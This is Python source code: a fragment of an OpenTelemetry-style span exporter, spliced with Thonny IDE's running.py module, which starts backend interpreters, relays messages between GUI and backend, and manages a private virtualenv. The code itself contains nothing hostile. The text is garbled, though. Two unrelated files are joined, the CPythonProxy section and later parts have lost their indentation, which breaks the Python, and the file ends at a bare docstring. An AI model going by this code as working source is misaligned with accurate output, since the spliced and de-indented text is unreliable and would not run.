            duration = (end - start) / 1e9
            timeout = self.schedule_delay_millis / 1e3 - duration
        # be sure that all spans are sent
        self._flush()

    def export(self) -> None:
        """Exports at most max_export_batch_size spans."""
        idx = 0
        # currently only a single thread acts as consumer, so queue.pop() will
        # not raise an exception
        while idx < self.max_export_batch_size and self.queue:
            self.spans_list[idx] = self.queue.pop()
            idx += 1
        with Context.use(suppress_instrumentation=True):
            try:
                # Ignore type b/c the Optional[None]+slicing is too "clever"
                # for mypy
                self.span_exporter.export(
                    self.spans_list[:idx]
                )  # type: ignore
            # pylint: disable=broad-except
            except Exception:
                logger.exception("Exception while exporting Span batch.")
        # clean up list so exported spans can be garbage collected
        for index in range(idx):
            self.spans_list[index] = None

    def _flush(self):
        # export all elements until queue is empty
        while self.queue:
            self.export()

    def shutdown(self) -> None:
        # signal the worker thread to finish and then wait for it
        self.done = True
        with self.condition:
            self.condition.notify_all()
        self.worker_thread.join()
        self.span_exporter.shutdown()
class ConsoleSpanExporter(SpanExporter):
    """SpanExporter that writes spans to the console.

    Useful for diagnostics: each exported span is printed to STDOUT.
    """

    def export(self, spans: typing.Sequence[Span]) -> SpanExportResult:
        # Print one span per line; exporting to the console never fails.
        for exported_span in spans:
            print(exported_span)
        return SpanExportResult.SUCCESS
|
running.py
|
# -*- coding: utf-8 -*-
"""Code for maintaining the background process and for running
user programs
Commands get executed via shell, this way the command line in the
shell becomes kind of title for the execution.
"""
import collections
import logging
import os.path
import shlex
import shutil
import signal
import subprocess
import sys
import time
import traceback
from logging import debug
from threading import Thread
from time import sleep
from thonny import (
THONNY_USER_DIR,
common,
get_runner,
get_shell,
get_workbench,
ui_utils,
)
from thonny.code import get_current_breakpoints, get_saved_current_script_filename
from thonny.common import (
BackendEvent,
CommandToBackend,
DebuggerCommand,
DebuggerResponse,
InlineCommand,
InputSubmission,
ToplevelCommand,
ToplevelResponse,
UserError,
normpath_with_actual_case,
is_same_path,
parse_message,
path_startswith,
serialize_message,
update_system_path,
)
from thonny.misc_utils import construct_cmd_line, running_on_mac_os, running_on_windows
from typing import Any, List, Optional, Sequence, Set # @UnusedImport; @UnusedImport
from thonny.terminal import run_in_terminal
from thonny.ui_utils import select_sequence
WINDOWS_EXE = "python.exe"
OUTPUT_MERGE_THRESHOLD = 1000
# other components may turn it on in order to avoid grouping output lines into one event
io_animation_required = False
class Runner:
    """Mediates between the GUI and the backend process.

    Owns the current BackendProxy, tracks the execution state
    ("starting" / "running" / "waiting_toplevel_command" /
    "waiting_debugger_command"), registers the run-related commands and
    pumps messages from the backend into workbench events.
    """

    def __init__(self) -> None:
        get_workbench().set_default("run.auto_cd", True)

        self._init_commands()
        self._state = "starting"
        self._proxy = None  # type: Any
        # True while backend events are being published to workbench
        # listeners; commands sent during that window get postponed.
        self._publishing_events = False
        self._polling_after_id = None
        self._postponed_commands = []  # type: List[CommandToBackend]

    def _remove_obsolete_jedi_copies(self) -> None:
        # Thonny 2.1 used to copy jedi in order to make it available
        # for the backend. Get rid of it now
        for item in os.listdir(THONNY_USER_DIR):
            if item.startswith("jedi_0."):
                shutil.rmtree(os.path.join(THONNY_USER_DIR, item), True)

    def start(self) -> None:
        """Allocate a console if needed and start the backend process."""
        self._check_alloc_console()
        self.restart_backend(False, True)
        # temporary
        self._remove_obsolete_jedi_copies()

    def _init_commands(self) -> None:
        """Register run/stop/interrupt commands and their option defaults."""
        get_workbench().set_default("run.run_in_terminal_python_repl", False)
        get_workbench().set_default("run.run_in_terminal_keep_open", True)

        get_workbench().add_command(
            "run_current_script",
            "run",
            "Run current script",
            caption="Run",
            handler=self._cmd_run_current_script,
            default_sequence="<F5>",
            extra_sequences=[select_sequence("<Control-r>", "<Command-r>")],
            tester=self._cmd_run_current_script_enabled,
            group=10,
            image="run-current-script",
            include_in_toolbar=True,
            show_extra_sequences=True,
        )

        get_workbench().add_command(
            "run_current_script_in_terminal",
            "run",
            "Run current script in terminal",
            caption="RunT",
            handler=self._cmd_run_current_script_in_terminal,
            default_sequence="<Control-t>",
            extra_sequences=["<<CtrlTInText>>"],
            tester=self._cmd_run_current_script_in_terminal_enabled,
            group=35,
            image="terminal",
        )

        get_workbench().add_command(
            "restart",
            "run",
            "Stop/Restart backend",
            caption="Stop",
            handler=self.cmd_stop_restart,
            default_sequence="<Control-F2>",
            group=70,
            image="stop",
            include_in_toolbar=True,
        )

        get_workbench().add_command(
            "interrupt",
            "run",
            "Interrupt execution",
            handler=self._cmd_interrupt,
            tester=self._cmd_interrupt_enabled,
            default_sequence="<Control-c>",
            group=70,
            bell_when_denied=False,
        )

    def get_state(self) -> str:
        """State is one of "running", "waiting_debugger_command", "waiting_toplevel_command"
        """
        return self._state

    def _set_state(self, state: str) -> None:
        if self._state != state:
            logging.debug("Runner state changed: %s ==> %s" % (self._state, state))
            self._state = state

    def is_running(self):
        return self._state == "running"

    def is_waiting(self):
        return self._state.startswith("waiting")

    def is_waiting_toplevel_command(self):
        return self._state == "waiting_toplevel_command"

    def is_waiting_debugger_command(self):
        return self._state == "waiting_debugger_command"

    def get_sys_path(self) -> List[str]:
        return self._proxy.get_sys_path()

    def send_command(self, cmd: CommandToBackend) -> None:
        """Validate the command against the current state and forward it
        to the backend proxy (or postpone/discard it)."""
        if self._proxy is None:
            return

        if self._publishing_events:
            # allow all event handlers to complete before sending the commands
            # issued by first event handlers
            self._postpone_command(cmd)
            return

        # First sanity check
        if (
            isinstance(cmd, ToplevelCommand)
            and not self.is_waiting_toplevel_command()
            and cmd.name not in ["Reset", "Run", "Debug"]
            or isinstance(cmd, DebuggerCommand)
            and not self.is_waiting_debugger_command()
        ):
            get_workbench().bell()
            logging.warning(
                "RUNNER: Command %s was attempted at state %s" % (cmd, self.get_state())
            )
            return

        # Attach extra info
        if "debug" in cmd.name.lower():
            cmd["breakpoints"] = get_current_breakpoints()

        # Offer the command
        logging.debug("RUNNER Sending: %s, %s", cmd.name, cmd)
        response = self._proxy.send_command(cmd)

        if response == "discard":
            return
        elif response == "postpone":
            self._postpone_command(cmd)
            return
        else:
            assert response is None

        get_workbench().event_generate("CommandAccepted", command=cmd)

        if isinstance(cmd, (ToplevelCommand, DebuggerCommand)):
            self._set_state("running")

        # Capitalized command names signal a backend restart by convention.
        if cmd.name[0].isupper():
            get_workbench().event_generate("BackendRestart")

    def _postpone_command(self, cmd: CommandToBackend) -> None:
        # in case of InlineCommands, discard older same type command
        if isinstance(cmd, InlineCommand):
            for older_cmd in self._postponed_commands:
                if older_cmd.name == cmd.name:
                    self._postponed_commands.remove(older_cmd)

        if len(self._postponed_commands) > 10:
            logging.warning(
                "Can't pile up too many commands. This command will be just ignored"
            )
        else:
            self._postponed_commands.append(cmd)

    def _send_postponed_commands(self) -> None:
        todo = self._postponed_commands
        self._postponed_commands = []

        for cmd in todo:
            logging.debug("Sending postponed command: %s", cmd)
            self.send_command(cmd)

    def send_program_input(self, data: str) -> None:
        assert self.is_running()
        self._proxy.send_program_input(data)

    def execute_script(
        self,
        script_path: str,
        args: List[str],
        working_directory: Optional[str] = None,
        command_name: str = "Run",
    ) -> None:
        """Compose a magic command line (optionally prefixed with %cd) and
        submit it to the shell, which performs the actual execution."""
        if (
            working_directory is not None
            and get_workbench().get_cwd() != working_directory
        ):
            # create compound command
            # start with %cd
            cd_cmd_line = construct_cmd_line(["%cd", working_directory]) + "\n"
            next_cwd = working_directory
        else:
            # create simple command
            cd_cmd_line = ""
            next_cwd = get_workbench().get_cwd()

        # append main command (Run, run, Debug or debug)
        rel_filename = os.path.relpath(script_path, next_cwd)
        exe_cmd_line = (
            construct_cmd_line(["%" + command_name, rel_filename] + args) + "\n"
        )

        # submit to shell (shell will execute it)
        get_shell().submit_magic_command(cd_cmd_line + exe_cmd_line)

    def execute_current(
        self, command_name: str, always_change_to_script_dir: bool = False
    ) -> None:
        """
        This method's job is to create a command for running/debugging
        current file/script and submit it to shell
        """
        if not self.is_waiting_toplevel_command():
            self.restart_backend(False, False, 2)

        filename = get_saved_current_script_filename()

        if not filename:
            # cancel must have been pushed
            return

        # changing dir may be required
        script_dir = normpath_with_actual_case(os.path.dirname(filename))

        if (
            get_workbench().get_option("run.auto_cd")
            and command_name[0].isupper()
            or always_change_to_script_dir
        ):
            working_directory = script_dir  # type: Optional[str]
        else:
            working_directory = None

        args = self._get_active_arguments()

        self.execute_script(filename, args, working_directory, command_name)

    def _get_active_arguments(self):
        # Parse the user-supplied program arguments shell-style.
        if get_workbench().get_option("view.show_program_arguments"):
            args_str = get_workbench().get_option("run.program_arguments")
            get_workbench().log_program_arguments_string(args_str)
            return shlex.split(args_str)
        else:
            return []

    def _cmd_run_current_script_enabled(self) -> bool:
        return (
            get_workbench().get_editor_notebook().get_current_editor() is not None
            and "run" in get_runner().get_supported_features()
        )

    def _cmd_run_current_script_in_terminal_enabled(self) -> bool:
        return (
            self._proxy
            and "run_in_terminal" in self._proxy.get_supported_features()
            and self._cmd_run_current_script_enabled()
        )

    def _cmd_run_current_script(self) -> None:
        self.execute_current("Run")

    def _cmd_run_current_script_in_terminal(self) -> None:
        filename = get_saved_current_script_filename()
        self._proxy.run_script_in_terminal(
            filename,
            self._get_active_arguments(),
            get_workbench().get_option("run.run_in_terminal_python_repl"),
            get_workbench().get_option("run.run_in_terminal_keep_open"),
        )

    def _cmd_interrupt(self) -> None:
        if self._proxy is not None:
            self._proxy.interrupt()
        else:
            logging.warning("Interrupting without proxy")

    def _cmd_interrupt_enabled(self) -> bool:
        if not self._proxy or not self._proxy.is_functional():
            return False
        # TODO: distinguish command and Ctrl+C shortcut

        widget = get_workbench().focus_get()
        if not running_on_mac_os():  # on Mac Ctrl+C is not used for Copy
            if widget is not None and hasattr(widget, "selection_get"):
                try:
                    selection = widget.selection_get()
                    if isinstance(selection, str) and len(selection) > 0:
                        # assuming user meant to copy, not interrupt
                        # (IDLE seems to follow same logic)
                        return False
                except Exception:
                    # selection_get() gives error when calling without selection on Ubuntu
                    pass

        # TODO: should it be get_runner().is_waiting_toplevel_command() ??
        return True

    def cmd_stop_restart(self) -> None:
        self.restart_backend(True)

    def _poll_vm_messages(self) -> None:
        """I chose polling instead of event_generate in listener thread,
        because event_generate across threads is not reliable
        http://www.thecodingforums.com/threads/more-on-tk-event_generate-and-threads.359615/
        """
        self._polling_after_id = None
        if self._pull_vm_messages() is False:
            return

        self._polling_after_id = get_workbench().after(20, self._poll_vm_messages)

    def _pull_vm_messages(self):
        """Drain the proxy's message queue; return False to stop polling."""
        while self._proxy is not None:
            try:
                msg = self._proxy.fetch_next_message()
                if not msg:
                    break
                logging.debug(
                    "RUNNER GOT: %s, %s in state: %s",
                    msg.event_type,
                    msg,
                    self.get_state(),
                )

            except BackendTerminatedError as exc:
                self._report_backend_crash(exc)
                self.destroy_backend()
                return False

            if msg.get("SystemExit", False):
                self.restart_backend(True)
                return False

            # change state
            if isinstance(msg, ToplevelResponse):
                self._set_state("waiting_toplevel_command")
            elif isinstance(msg, DebuggerResponse):
                self._set_state("waiting_debugger_command")
            else:
                "other messages don't affect the state"

            if "cwd" in msg:
                get_workbench().set_cwd(msg["cwd"])

            # Publish the event
            # NB! This may cause another command to be sent before we get to postponed commands.
            try:
                self._publishing_events = True
                class_event_type = type(msg).__name__
                get_workbench().event_generate(
                    class_event_type, event=msg
                )  # more general event
                if msg.event_type != class_event_type:
                    # more specific event
                    get_workbench().event_generate(msg.event_type, event=msg)
            finally:
                self._publishing_events = False

            # TODO: is it necessary???
            # https://stackoverflow.com/a/13520271/261181
            # get_workbench().update()

        self._send_postponed_commands()

    def _report_backend_crash(self, exc: Exception) -> None:
        # Show the crash (plus any recorded faults) in the shell as stderr.
        err = "Backend terminated (returncode: %s)\n" % getattr(exc, "returncode", "?")

        try:
            faults_file = os.path.join(THONNY_USER_DIR, "backend_faults.log")
            if os.path.exists(faults_file):
                with open(faults_file, encoding="ASCII") as fp:
                    err += fp.read()
        except Exception:
            logging.exception("Failed retrieving backend faults")

        err = err.strip() + "\nUse 'Stop/Restart' to restart the backend ...\n"

        get_workbench().event_generate("ProgramOutput", stream_name="stderr", data=err)

        get_workbench().become_active_window()

    def restart_backend(
        self, clean: bool, first: bool = False, wait: float = 0
    ) -> None:
        """Recreate (or replace) backend proxy / backend process."""

        if not first:
            get_shell().restart()
            get_shell().update_idletasks()

        self.destroy_backend()
        backend_name = get_workbench().get_option("run.backend_name")
        if backend_name not in get_workbench().get_backends():
            raise UserError(
                "Can't find backend '{}'. Please select another backend from options".format(
                    backend_name
                )
            )

        backend_class = get_workbench().get_backends()[backend_name].proxy_class
        self._set_state("running")
        self._proxy = None
        self._proxy = backend_class(clean)

        self._poll_vm_messages()

        if wait:
            start_time = time.time()
            # Busy-wait (while keeping the GUI alive) until the backend
            # reports readiness or the timeout expires.
            while (
                not self.is_waiting_toplevel_command()
                and time.time() - start_time <= wait
            ):
                # self._pull_vm_messages()
                get_workbench().update()
                sleep(0.01)

        get_workbench().event_generate("BackendRestart")

    def destroy_backend(self) -> None:
        """Stop polling, drop postponed commands and destroy the proxy."""
        if self._polling_after_id is not None:
            get_workbench().after_cancel(self._polling_after_id)
            self._polling_after_id = None

        self._postponed_commands = []
        if self._proxy:
            self._proxy.destroy()
            self._proxy = None

    def get_local_executable(self) -> Optional[str]:
        if self._proxy is None:
            return None
        else:
            return self._proxy.get_local_executable()

    def get_backend_proxy(self) -> "BackendProxy":
        return self._proxy

    def _check_alloc_console(self) -> None:
        # On Windows GUI builds, attach to a helper child's console so that
        # interrupts (Ctrl+Break) can be delivered to the backend.
        if sys.executable.endswith("thonny.exe") or sys.executable.endswith(
            "pythonw.exe"
        ):
            # These don't have console allocated.
            # Console is required for sending interrupts.

            # AllocConsole would be easier but flashes console window

            import ctypes

            kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)

            exe = sys.executable.replace("thonny.exe", "python.exe").replace(
                "pythonw.exe", "python.exe"
            )

            cmd = [exe, "-c", "print('Hi!'); input()"]
            child = subprocess.Popen(
                cmd,
                stdin=subprocess.PIPE,
                stdout=subprocess.PIPE,
                stderr=subprocess.PIPE,
                shell=True,
            )
            child.stdout.readline()
            result = kernel32.AttachConsole(child.pid)
            if not result:
                err = ctypes.get_last_error()
                logging.info("Could not allocate console. Error code: " + str(err))
            child.stdin.write(b"\n")
            try:
                child.stdin.flush()
            except Exception:
                # May happen eg. when installation path has "&" in it
                # See https://bitbucket.org/plas/thonny/issues/508/cant-allocate-windows-console-when
                # Without flush the console window becomes visible, but Thonny can be still used
                logging.getLogger("thonny").exception(
                    "Problem with finalizing console allocation"
                )

    def can_do_file_operations(self):
        return self._proxy and self._proxy.can_do_file_operations()

    def get_supported_features(self) -> Set[str]:
        if self._proxy is None:
            return set()
        else:
            return self._proxy.get_supported_features()

    def has_separate_files(self):
        if self._proxy is None:
            return False
        else:
            return self._proxy.has_separate_files()

    def get_node_label(self):
        if self._proxy is None:
            return "Back-end"
        else:
            return self._proxy.get_node_label()

    def using_venv(self) -> bool:
        return isinstance(self._proxy, CPythonProxy) and self._proxy.in_venv
class BackendProxy:
    """Communicates with backend process.

    All communication methods must be non-blocking,
    ie. suitable for calling from GUI thread."""

    # backend_name will be overwritten on Workbench.add_backend
    # Subclasses don't need to worry about it.
    backend_name = None

    def __init__(self, clean: bool) -> None:
        """Initializes (or starts the initialization of) the backend process.

        Backend is considered ready when the runner gets a ToplevelResponse
        with attribute "welcome_text" from fetch_next_message.
        """

    def send_command(self, cmd: CommandToBackend) -> Optional[str]:
        """Send the command to backend. Return None, 'discard' or 'postpone'"""
        method_name = "_cmd_" + cmd.name
        if hasattr(self, method_name):
            return getattr(self, method_name)(cmd)
        else:
            # Logger.warn is a deprecated alias (removed in Python 3.13);
            # use warning instead.
            logging.getLogger("thonny").warning("Discarding %s", cmd)
            return "discard"

    def send_program_input(self, data: str) -> None:
        """Send input data to backend"""
        raise NotImplementedError()

    def fetch_next_message(self):
        """Read next message from the queue or None if queue is empty"""
        raise NotImplementedError()

    def run_script_in_terminal(self, script_path, interactive, keep_open):
        raise NotImplementedError()

    def get_sys_path(self):
        "backend's sys.path"
        return []

    def get_backend_name(self):
        return type(self).backend_name

    def interrupt(self):
        """Tries to interrupt current command without resetting the backend"""
        pass

    def destroy(self):
        """Called when Thonny no longer needs this instance
        (Thonny gets closed or new backend gets selected)
        """
        pass

    def is_functional(self):
        """Used in MicroPython proxies"""
        return True

    def get_local_executable(self):
        """Return system command for invoking current interpreter"""
        return None

    def get_supported_features(self):
        return {"run"}

    def get_node_label(self):
        """Used as files caption if back-end has separate files"""
        return "Back-end"

    def has_separate_files(self):
        return False

    def can_do_file_operations(self):
        return False
class CPythonProxy(BackendProxy):
"abstract class"
def __init__(self, executable):
super().__init__(True)
self._executable = executable
self._proc = None
self._message_queue = None
self._sys_path = []
self._usersitepackages = None
self._gui_update_loop_id = None
self.in_venv = None
self._start_new_process()
def fetch_next_message(self):
if not self._message_queue or len(self._message_queue) == 0:
if self._proc is not None:
retcode = self._proc.poll()
if retcode is not None:
raise BackendTerminatedError(retcode)
return None
msg = self._message_queue.popleft()
self._store_state_info(msg)
if msg.event_type == "ProgramOutput":
# combine available small output messages to one single message,
# in order to put less pressure on UI code
while True:
if len(self._message_queue) == 0:
return msg
else:
next_msg = self._message_queue.popleft()
if (
next_msg.event_type == "ProgramOutput"
and next_msg["stream_name"] == msg["stream_name"]
and len(msg["data"]) + len(next_msg["data"])
<= OUTPUT_MERGE_THRESHOLD
and ("\n" not in msg["data"] or not io_animation_required)
):
msg["data"] += next_msg["data"]
else:
# not same type of message, put it back
self._message_queue.appendleft(next_msg)
return msg
else:
return msg
def _store_state_info(self, msg):
if "gui_is_active" in msg:
self._update_gui_updating(msg)
if "in_venv" in msg:
self.in_venv = msg["in_venv"]
if "path" in msg:
self._sys_path = msg["path"]
if "usersitepackages" in msg:
self._usersitepackages = msg["usersitepackages"]
if "prefix" in msg:
self._sys_prefix = msg["prefix"]
if "exe_dirs" in msg:
self._exe_dirs = msg["exe_dirs"]
def send_command(self, cmd):
if isinstance(cmd, ToplevelCommand) and cmd.name[0].isupper():
self._close_backend()
self._start_new_process(cmd)
self._send_msg(cmd)
def _send_msg(self, msg):
self._proc.stdin.write(serialize_message(msg) + "\n")
self._proc.stdin.flush()
def send_program_input(self, data):
self._send_msg(InputSubmission(data))
def get_sys_path(self):
return self._sys_path
def interrupt(self):
if self._proc is not None and self._proc.poll() is None:
if running_on_windows():
try:
os.kill(
self._proc.pid, signal.CTRL_BREAK_EVENT
) # @UndefinedVariable
except Exception:
logging.exception("Could not interrupt backend process")
else:
self._proc.send_signal(signal.SIGINT)
def destroy(self):
self._close_backend()
def _close_backend(self):
self._cancel_gui_update_loop()
if self._proc is not None and self._proc.poll() is None:
self._proc.kill()
self._proc = None
self._message_queue = None
def _start_new_process(self, cmd=None):
# deque, because in one occasion I need to put messages back
self._message_queue = collections.deque()
# prepare environment
my_env = get_environment_for_python_subprocess(self._executable)
# variables controlling communication with the back-end process
my_env["PYTHONIOENCODING"] = "utf-8"
# Let back-end know about plug-ins
my_env["THONNY_USER_DIR"] = THONNY_USER_DIR
if get_workbench().in_debug_mode():
my_env["THONNY_DEBUG"] = "1"
elif "THONNY_DEBUG" in my_env:
del my_env["THONNY_DEBUG"]
if not os.path.exists(self._executable):
raise UserError(
"Interpreter (%s) not found. Please recheck corresponding option!"
% self._executable
)
import thonny.backend_launcher
cmd_line = [
self._executable,
"-u", # unbuffered IO
"-B", # don't write pyo/pyc files
# (to avoid problems when using different Python versions without write permissions)
thonny.backend_launcher.__file__,
]
if hasattr(cmd, "filename"):
cmd_line.append(cmd.filename)
if hasattr(cmd, "args"):
cmd_line.extend(cmd.args)
if hasattr(cmd, "environment"):
my_env.update(cmd.environment)
creationflags = 0
if running_on_windows():
creationflags = subprocess.CREATE_NEW_PROCESS_GROUP
debug("Starting the backend: %s %s", cmd_line, get_workbench().get_cwd())
self._proc = subprocess.Popen(
cmd_line,
# bufsize=0,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=get_workbench().get_cwd(),
env=my_env,
universal_newlines=True,
creationflags=creationflags,
)
# send init message
self._send_msg({"frontend_sys_path": sys.path})
if cmd:
# Consume the ready message, cmd will get its own result message
ready_line = self._proc.stdout.readline()
if ready_line == "": # There was some problem
error_msg = self._proc.stderr.read()
raise Exception("Error starting backend process: " + error_msg)
self._store_state_info(parse_message(ready_line))
# setup asynchronous output listeners
Thread(target=self._listen_stdout, daemon=True).start()
Thread(target=self._listen_stderr, daemon=True).start()
def _listen_stdout(self):
# debug("... started listening to stdout")
# will be called from separate thread
message_queue = self._message_queue
def publish_as_msg(data):
msg = parse_message(data)
if "cwd" in msg:
self.cwd = msg["cwd"]
message_queue.append(msg)
while len(message_queue) > 100:
# Probably backend runs an infinite/long print loop.
# Throttle message thougput in order to keep GUI thread responsive.
sleep(0.1)
while self._proc is not None:
data = self._proc.stdout.readline()
# debug("... read some stdout data", repr(data))
if data == "":
break
else:
try:
publish_as_msg(data)
except Exception:
traceback.print_exc()
# Can mean the line was from subprocess,
# which can't be captured by stream faking.
# NB! If subprocess printed it without linebreak,
# then the suffix can be thonny message
parts = data.rsplit(common.MESSAGE_MARKER, maxsplit=1)
# print first part as it is
message_queue.append(
BackendEvent(
"ProgramOutput", data=parts[0], stream_name="stdout"
)
)
if len(parts) == 2:
second_part = common.MESSAGE_MARKER + parts[1]
try:
publish_as_msg(second_part)
except Exception:
# just print ...
message_queue.append(
BackendEvent(
"ProgramOutput",
data=second_part,
stream_name="stdout",
)
)
def _listen_stderr(self):
# stderr is used only for debugger debugging
while True:
data = self._proc.stderr.readline()
if data == "":
break
else:
self._message_queue.append(
BackendEvent("ProgramOutput", stream_name="stderr", data=data)
)
def get_local_executable(self):
return self._executable
def get_site_packages(self):
# NB! site.sitepackages may not be present in virtualenv
for d in self._sys_path:
if ("site-packages" in d or "dist-packages" in d) and path_startswith(
d, self._sys_prefix
):
return d
return None
def get_user_site_packages(self):
return self._usersitepackages
def get_exe_dirs(self):
return self._exe_dirs
def _update_gui_updating(self, msg):
"""Enables running Tkinter or Qt programs which doesn't call mainloop.
When mainloop is omitted, then program can be interacted with
from the shell after it runs to the end.
Each ToplevelResponse is supposed to tell, whether gui is active
and needs updating.
"""
if not "gui_is_active" in msg:
return
if msg["gui_is_active"] and self._gui_update_loop_id is None:
# Start updating
self._loop_gui_update(True)
elif not msg["gui_is_active"] and self._gui_update_loop_id is not None:
self._cancel_gui_update_loop()
def _loop_gui_update(self, force=False):
if force or get_runner().is_waiting_toplevel_command():
self.send_command(InlineCommand("process_gui_events"))
self._gui_update_loop_id = get_workbench().after(50, self._loop_gui_update)
def _cancel_gui_update_loop(self):
if self._gui_update_loop_id is not None:
try:
get_workbench().after_cancel(self._gui_update_loop_id)
finally:
self._gui_update_loop_id = None
def run_script_in_terminal(self, script_path, args, interactive, keep_open):
cmd = [self._executable]
if interactive:
cmd.append("-i")
cmd.append(os.path.basename(script_path))
cmd.extend(args)
run_in_terminal(cmd, os.path.dirname(script_path), keep_open=keep_open)
    def get_supported_features(self):
        """Return the set of feature names this backend proxy supports."""
        return {"run", "debug", "run_in_terminal", "pip_gui", "system_shell"}
class PrivateVenvCPythonProxy(CPythonProxy):
    """CPython backend running inside Thonny's own private virtualenv."""

    def __init__(self, clean):
        # NOTE(review): *clean* is accepted for signature compatibility with
        # the other proxies but is not used here — confirm intentional.
        self._prepare_private_venv()
        CPythonProxy.__init__(self, get_private_venv_executable())

    def _prepare_private_venv(self):
        """Create the private venv if missing, otherwise check/upgrade it."""
        path = get_private_venv_path()
        if os.path.isdir(path) and os.path.isfile(os.path.join(path, "pyvenv.cfg")):
            self._check_upgrade_private_venv(path)
        else:
            self._create_private_venv(
                path, "Please wait!\nThonny prepares its virtual environment."
            )

    def _check_upgrade_private_venv(self, path):
        # If home is wrong then regenerate
        # If only micro version is different, then upgrade
        info = _get_venv_info(path)
        if not is_same_path(info["home"], os.path.dirname(sys.executable)):
            self._create_private_venv(
                path,
                "Thonny's virtual environment was created for another interpreter.\n"
                + "Regenerating the virtual environment for current interpreter.\n"
                + "(You may need to reinstall your 3rd party packages)\n"
                + "Please wait!.",
                clear=True,
            )
        else:
            venv_version = tuple(map(int, info["version"].split(".")))
            sys_version = sys.version_info[:3]
            # major/minor must agree — the venv directory name encodes them
            assert venv_version[0] == sys_version[0]
            assert venv_version[1] == sys_version[1]

            if venv_version[2] != sys_version[2]:
                self._create_private_venv(
                    path,
                    "Please wait!\nUpgrading Thonny's virtual environment.",
                    upgrade=True,
                )

    def _create_private_venv(self, path, description, clear=False, upgrade=False):
        """(Re)create the venv at *path*, showing *description* in a dialog."""
        # Don't include system site packages
        # This way all students will have similar configuration
        # independently of system Python (if Thonny is used with system Python)
        # NB! Cant run venv.create directly, because in Windows
        # it tries to link venv to thonny.exe.
        # Need to run it via proper python
        args = ["-m", "venv"]
        if clear:
            args.append("--clear")
        if upgrade:
            args.append("--upgrade")

        try:
            # pylint: disable=unused-variable
            import ensurepip  # @UnusedImport
        except ImportError:
            args.append("--without-pip")

        args.append(path)

        proc = create_frontend_python_process(args)

        from thonny.ui_utils import SubprocessDialog

        dlg = SubprocessDialog(
            get_workbench(), proc, "Preparing the backend", long_description=description
        )
        try:
            ui_utils.show_dialog(dlg)
        except Exception:
            # if using --without-pip the dialog may close very quickly
            # and for some reason wait_window would give error then
            logging.exception("Problem with waiting for venv creation dialog")
        get_workbench().become_active_window()  # Otherwise focus may get stuck somewhere

        bindir = os.path.dirname(get_private_venv_executable())
        # create private env marker
        marker_path = os.path.join(bindir, "is_private")
        with open(marker_path, mode="w") as fp:
            fp.write("# This file marks Thonny-private venv")

        # Create recommended pip conf to get rid of list deprecation warning
        # https://github.com/pypa/pip/issues/4058
        pip_conf = "pip.ini" if running_on_windows() else "pip.conf"
        with open(os.path.join(path, pip_conf), mode="w") as fp:
            fp.write("[list]\nformat = columns")

        assert os.path.isdir(path)
class SameAsFrontendCPythonProxy(CPythonProxy):
    """Backend that reuses the same Python interpreter as the frontend."""

    def __init__(self, clean):
        CPythonProxy.__init__(self, get_frontend_python())

    def fetch_next_message(self):
        """Tag the welcome message with the interpreter's origin."""
        msg = super().fetch_next_message()
        if msg and "welcome_text" in msg:
            if using_bundled_python():
                suffix = " (bundled)"
            else:
                suffix = " (" + self._executable + ")"
            msg["welcome_text"] += suffix
        return msg
class CustomCPythonProxy(CPythonProxy):
    """Backend that runs a user-chosen CPython interpreter."""

    def __init__(self, clean):
        executable = get_workbench().get_option("CustomInterpreter.path")

        # Remember that this non-default interpreter has been used
        used_interpreters = get_workbench().get_option("CustomInterpreter.used_paths")
        if executable not in used_interpreters:
            used_interpreters.append(executable)
            get_workbench().set_option("CustomInterpreter.used_paths", used_interpreters)

        CPythonProxy.__init__(self, executable)

    def fetch_next_message(self):
        """Tag the welcome message with the interpreter's path."""
        msg = super().fetch_next_message()
        if msg and "welcome_text" in msg:
            msg["welcome_text"] += " (" + self._executable + ")"
        return msg
def get_private_venv_path():
    """Return the directory where Thonny keeps its private virtualenv.

    The name encodes the frontend's major/minor Python version; a bundled
    Thonny install gets a separate "BundledPython" prefix.
    """
    bundled = "thonny" in sys.executable.lower()
    prefix = "BundledPython" if bundled else "Python"
    version_tag = "%d%d" % (sys.version_info[0], sys.version_info[1])
    return os.path.join(THONNY_USER_DIR, prefix + version_tag)
def get_private_venv_executable():
    """Return the path of the python executable inside the private venv."""
    venv_path = get_private_venv_path()
    if running_on_windows():
        # Windows venvs keep executables under Scripts\
        return os.path.join(venv_path, "Scripts", WINDOWS_EXE)
    # POSIX venvs keep them under bin/
    return os.path.join(venv_path, "bin", "python3")
def _get_venv_info(venv_path):
cfg_path = os.path.join(venv_path, "pyvenv.cfg")
result = {}
with open(cfg_path, encoding="UTF-8") as fp:
for line in fp:
if "=" in line:
key, val = line.split("=", maxsplit=1)
result[key.strip()] = val.strip()
return result
def using_bundled_python():
    """True if the frontend itself runs on Thonny-bundled Python."""
    return is_bundled_python(sys.executable)
def is_bundled_python(executable):
    """True if *executable* sits next to a "thonny_python.ini" marker file."""
    marker = os.path.join(os.path.dirname(executable), "thonny_python.ini")
    return os.path.exists(marker)
def create_backend_python_process(
    args, stdin=None, stdout=subprocess.PIPE, stderr=subprocess.STDOUT
):
    """Used for running helper commands (eg. pip) on CPython backend.

    Assumes current backend is CPython.
    """
    # TODO: if backend == frontend, then delegate to create_frontend_python_process
    python_exe = get_runner().get_local_executable()

    env = get_environment_for_python_subprocess(python_exe)
    # force UTF-8, unbuffered output so the caller can stream it
    env["PYTHONIOENCODING"] = "utf-8"
    env["PYTHONUNBUFFERED"] = "1"

    # TODO: remove frontend python from path and add backend python to it
    return _create_python_process(python_exe, args, stdin, stdout, stderr, env=env)
def create_frontend_python_process(
    args, stdin=None, stdout=subprocess.PIPE, stderr=subprocess.STDOUT
):
    """Used for running helper commands (eg. for installing plug-ins on by the plug-ins)"""
    # Use the CLI python even when the frontend was started via pythonw.exe
    python_exe = get_frontend_python().replace("pythonw.exe", "python.exe")

    env = get_environment_for_python_subprocess(python_exe)
    # force UTF-8, unbuffered output so the caller can stream it
    env["PYTHONIOENCODING"] = "utf-8"
    env["PYTHONUNBUFFERED"] = "1"

    # BUG FIX: env was previously computed but never passed on, so the
    # settings above had no effect (cf. create_backend_python_process).
    return _create_python_process(python_exe, args, stdin, stdout, stderr, env=env)
def _create_python_process(
    python_exe,
    args,
    stdin=None,
    stdout=subprocess.PIPE,
    stderr=subprocess.STDOUT,
    shell=False,
    env=None,
    universal_newlines=True,
):
    """Launch *python_exe* with *args* and return the Popen object.

    The full command line is attached to the returned object as ``cmd``.
    """
